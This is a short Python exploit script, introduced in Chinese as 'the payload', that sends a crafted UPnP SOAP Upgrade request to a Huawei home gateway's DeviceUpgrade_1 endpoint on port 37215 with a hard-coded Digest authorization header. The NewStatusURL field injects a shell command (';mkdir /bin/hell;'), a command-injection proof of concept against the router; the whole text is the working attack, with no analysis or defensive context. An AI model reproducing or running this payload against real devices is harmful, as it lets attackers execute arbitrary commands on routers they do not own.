payload如下：

 
 
 

  
  
  
import requests 
  
  
  
headers = {
  
  
  
 "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
  
  
  
}
  
  
  

  
  
  
data = '''<?xml version="1.0" ?>
  
  
  
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  
  
  
 <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
  
  
  
 <NewStatusURL>;mkdir /bin/hell;</NewStatusURL>
  
  
  
 <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  
  
  
 </u:Upgrade>
  
  
  
 </s:Body>
  
  
  
</s:Envelope>
  
  
  
'''
  
  
  
requests.post('http://192.168.3.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)